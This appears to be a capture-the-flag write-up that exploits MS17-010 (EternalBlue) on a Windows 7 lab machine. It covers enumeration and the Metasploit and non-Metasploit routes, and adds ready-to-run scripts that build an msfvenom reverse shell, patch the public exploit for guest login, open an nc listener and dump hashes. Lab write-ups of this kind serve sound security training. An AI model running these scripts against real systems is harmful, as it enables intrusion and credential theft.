Blue

Nmap Scanning
I will begin with an nmap scan to find open ports on the machine, the services running on them, their versions, and also perform OS detection.
$ nmap -A -T4 -p- 10.10.10.40 -Pn


The scan comes back with ports 139 and 445 (SMB) open, and the OS detection output identifies the host as Windows 7 Professional 7601 Service Pack 1 with the computer name haris-PC (the full output was in a screenshot that is not reproduced here).
Using Metasploit
Enumeration with Metasploit
From the machine name (Blue), ports 139 and 445 being open, and the OS being Windows 7, my first thought is that this box is meant for the EternalBlue exploit. Before exploiting, I use msfconsole and the auxiliary/scanner/smb/smb_ms17_010 module to confirm that the host is actually vulnerable to MS17-010 (aka EternalBlue).

After setting RHOSTS, I run the scanner. It reports that the host is likely vulnerable to MS17-010, and as part of the check it reads the OS string from the SMB negotiation, which again confirms Windows 7 Professional 7601 Service Pack 1.

Exploiting with Metasploit
We will now use the Metasploit module exploit/windows/smb/ms17_010_eternalblue to pwn the box. Set RHOSTS and LHOST as before; the default payload (an x64 meterpreter reverse shell) is fine for this target.
The exploit is not fully reliable, so you may need to run it several times before you get a shell. You can also experiment with changing the payload if sessions fail to come back.



In the meterpreter shell, getuid shows which account the session is running as. A successful EternalBlue exploit lands directly as NT AUTHORITY\SYSTEM, so no privilege escalation is needed. Because we are SYSTEM, hashdump works as well and dumps the local account hashes. We can now navigate through the file system and retrieve both the user and root flags.
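The enumeration and exploitation steps above, collected into an msfconsole resource script so the scan and the exploit can be re-run without retyping. This is an added example, not part of the original write-up; the target and attacker addresses (10.10.10.40, 10.10.14.3) and port 4444 are this lab's values, and the attacker address is assumed to match the one used with msfvenom later on.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): drive msfconsole with a
# resource script for the MS17-010 check and the EternalBlue exploit.
set -euo pipefail

RHOSTS=10.10.10.40
LHOST=10.10.14.3     # assumed attacker VPN address
LPORT=4444

# Write the resource script: scan first, then exploit with the module's
# default x64 meterpreter payload. After a session opens, run getuid and
# hashdump by hand (or swap the payload if sessions keep dying).
write_blue_rc() {
    cat > "$1" <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $RHOSTS
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $RHOSTS
set LHOST $LHOST
set LPORT $LPORT
set payload windows/x64/meterpreter/reverse_tcp
exploit
EOF
}

# Only write the file and launch msfconsole when explicitly asked, so the
# script can be sourced/inspected without side effects.
if [ "${MSF_RUN:-0}" = 1 ]; then
    write_blue_rc blue.rc
    msfconsole -q -r blue.rc
fi
```

Run it with `MSF_RUN=1 ./blue.sh`; if the exploit fails, type `exploit` again at the msf prompt instead of re-running the whole script, since the scanner result does not change.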
Without Metasploit
Enumerating with Nmap Scripting Engine (NSE)
Following up on our nmap scans, we can use the NSE script smb-vuln-ms17-010 to check whether the machine is vulnerable to MS17-010 without touching Metasploit. It performs the same PeekNamedPipe check that the Metasploit scanner does.
$ nmap -p 139,445 --script smb-vuln-ms17-010 10.10.10.40 -Pn
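Both smb-vuln-ms17-010 and Metasploit's smb_ms17_010 scanner reach their verdict the same way: they send a TRANS_PEEK_NMPIPE (PeekNamedPipe) SMB_COM_TRANSACTION against FID 0 on the IPC$ tree. An unpatched host answers with STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched host answers with STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The following added example (my code, not from the write-up or from either scanner) parses the SMB1 header of such a reply and classifies it. The two sample replies are constructed in the code, not captured from 10.10.10.40.

```python
"""Added example: how the MS17-010 PeekNamedPipe check classifies a reply.

Parses the 4-byte NetBIOS session header plus the 32-byte SMB1 header
(MS-CIFS 2.2.3.1) and maps the NT status to vulnerable / patched.
Sample packets are constructed below; nothing here talks to the network.
"""
import struct

SMB_COM_TRANSACTION = 0x25
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched: vulnerable
STATUS_INVALID_HANDLE = 0xC0000008           # patched
STATUS_ACCESS_DENIED = 0xC0000022            # patched / hardened


def parse_smb1_header(pkt: bytes) -> dict:
    """Return the SMB1 header fields of a NetBIOS-framed SMB1 packet."""
    if len(pkt) < 4 + 32:
        raise ValueError("short packet")
    nb_type, nb_len = pkt[0], int.from_bytes(pkt[1:4], "big")
    if nb_type != 0x00 or nb_len != len(pkt) - 4:
        raise ValueError("bad NetBIOS session header")
    hdr = pkt[4:36]
    if hdr[:4] != b"\xffSMB":
        raise ValueError("not SMB1")
    # offset 4: Command (1), Status (4, little-endian), Flags (1), Flags2 (2)
    cmd, status, flags, flags2 = struct.unpack_from("<BIBH", hdr, 4)
    # offset 24: TID, PIDLow, UID, MID (2 bytes each)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {"command": cmd, "status": status, "flags": flags,
            "flags2": flags2, "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def classify_peek_response(pkt: bytes) -> str:
    """Verdict for the reply to a TRANS_PEEK_NMPIPE on FID 0."""
    h = parse_smb1_header(pkt)
    if h["command"] != SMB_COM_TRANSACTION:
        return "unexpected"
    if h["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"
    if h["status"] in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "patched"
    return "unknown"


def build_smb1_reply(command: int, status: int, tid: int = 0, pid: int = 0,
                     uid: int = 0, mid: int = 0) -> bytes:
    """Build a minimal SMB1 error reply (used only to construct samples)."""
    flags, flags2, pid_high = 0x98, 0xC807, 0  # typical server reply flags
    hdr = b"\xffSMB" + struct.pack("<BIBHH8sHHHHH", command, status, flags,
                                   flags2, pid_high, b"\x00" * 8, 0,
                                   tid, pid, uid, mid)
    body = b"\x00" + b"\x00\x00"  # WordCount = 0, ByteCount = 0
    payload = hdr + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


# Constructed sample replies (not captured traffic).
VULNERABLE_REPLY = build_smb1_reply(SMB_COM_TRANSACTION,
                                    STATUS_INSUFF_SERVER_RESOURCES,
                                    tid=2048, pid=65279, uid=2048, mid=64)
PATCHED_REPLY = build_smb1_reply(SMB_COM_TRANSACTION, STATUS_INVALID_HANDLE,
                                 tid=2048, pid=65279, uid=2048, mid=64)

if __name__ == "__main__":
    for name, pkt in (("unpatched host", VULNERABLE_REPLY),
                      ("patched host", PATCHED_REPLY)):
        print(f"{name}: status=0x{parse_smb1_header(pkt)['status']:08X} "
              f"-> {classify_peek_response(pkt)}")
```

The little-endian encoding of 0xC0000205 is the byte string 05 02 00 C0 at offset 9 of the framed packet; that is the literal the Metasploit scanner looks for when it prints "likely VULNERABLE".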
Next we look for a non-Metasploit exploit in the Exploit Database.

Since the target is Windows 7, we'll use EDB-ID 42315 (sleepya's zzz_exploit.py, which works against Windows 7 with any usable SMB login, even guest). Copy the exploit into the working directory:
$ searchsploit -m 42315.py
The -m flag mirrors (copies) the exploit into the current working directory.
After looking at the source code, we need to do three things:
Download mysmb.py since the exploit imports it. The download location is included in the exploit.
Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
Make changes in the exploit to add the authentication credentials and the reverse shell payload.
Since I already have mysmb.py, I will go ahead with creating a reverse shell payload using msfvenom.
$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.3 LPORT=4444 > eternal-blue.exe
Third, we need to change the exploit to add credentials. In our case we don’t have valid credentials, however, let’s check to see if guest login is allowed.
Running enum4linux shows that guest login is allowed:
$ enum4linux -a 10.10.10.40
The -a flag stands for "do all simple enumeration".
So in the exploit script we set USERNAME to 'guest' and leave PASSWORD empty.

Similarly, in the script's smb_pwn() function we replace the pwned.txt demo with a call to its smb_send_file helper to upload eternal-blue.exe to C:\ and a call to service_exec to run it.

Now that all 3 changes are done, start a listener on the attack machine on the port baked into the payload (4444).

Now let's run the exploit.
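The three changes above, scripted so that the payload build, the edits to 42315.py and the listener are done in one place. This is an added example, not part of the original write-up. It assumes the exploit file contains a line starting with USERNAME = near the top and that its smb_pwn() demo ends with smbConn.disconnectTree(tid2), which is how the published zzz_exploit.py/42315.py reads; check your copy before relying on the patch, and the addresses, port and file names are this lab's placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): apply the three manual
# edits to 42315.py and run it against the target. Requires msfvenom, nc,
# python2 and mysmb.py next to the exploit when actually run.
set -euo pipefail

TARGET=10.10.10.40
LHOST=10.10.14.3      # assumed attacker VPN address
LPORT=4444
EXPLOIT=42315.py
PAYLOAD=eternal-blue.exe

# Step 2: plain (non-meterpreter) reverse shell, as allowed on the OSCP.
build_payload() {
    msfvenom -p windows/shell_reverse_tcp -f exe \
        LHOST="$LHOST" LPORT="$LPORT" -o "$PAYLOAD"
}

# Step 3: $1 = original exploit, $2 = patched copy, $3 = local payload path.
#  - set USERNAME to guest (PASSWORD stays empty)
#  - after smb_pwn()'s disconnectTree(tid2), upload the exe to C:\ with the
#    script's smb_send_file helper and launch it with service_exec.
patch_exploit() {
    awk -v exe="$3" -v q="'" '
        /^USERNAME *=/ { print "USERNAME = " q "guest" q; next }
        { print }
        /smbConn\.disconnectTree\(tid2\)/ {
            match($0, /^[ \t]*/); ind = substr($0, 1, RLENGTH)
            n = split(exe, parts, "/"); base = parts[n]
            print ind "smb_send_file(smbConn, " q exe q ", " q "C" q ", " q "/" base q ")"
            print ind "service_exec(conn, r" q "cmd /c c:\\" base q ")"
        }' "$1" > "$2"
}

run_all() {
    build_payload
    patch_exploit "$EXPLOIT" "${EXPLOIT%.py}_guest.py" "$PWD/$PAYLOAD"
    # Listener in the background; service_exec starts the payload on the
    # target, which connects back here.
    nc -lvnp "$LPORT" &
    sleep 1
    python2 "${EXPLOIT%.py}_guest.py" "$TARGET"   # 42315.py is Python 2
    wait
}

# Only touch the network when explicitly asked.
if [ "${BLUE_RUN:-0}" = 1 ]; then run_all; fi
```

Run it with `BLUE_RUN=1 ./blue_nomsf.sh` from the directory holding 42315.py and mysmb.py; the patched copy is written as 42315_guest.py so the original stays untouched for comparison.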
A second non-Metasploit route uses the eternalblue_exploit7.py kernel-shellcode exploit. We will now download the public exploit code for MS17-010 from the link below:


Included is also an EternalBlue checker script that lets us test whether the target is potentially vulnerable to MS17-010.

Let's run ./shell_prep.sh and answer its prompts. Since we want to avoid Metasploit (OSCP style), we tell it to generate a regular cmd shell rather than meterpreter. (Fortunately, msfvenom itself is allowed on the OSCP.)


After the script finishes there is a shellcode blob named sc_all.bin in the shellcode directory, which bundles the x64 and x86 payloads. Next, open a new tab in your terminal and set up a listener. The port must be the same one you gave shell_prep.sh; since we know the target is 64-bit, the port that matters is the one entered for the x64 payload, which I set to 4444.
Once done, we are now ready to pwn the target.
Run:
$ python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>
The groom connection count defaults to 13; if the exploit fails without crashing the box, try again with a higher number.
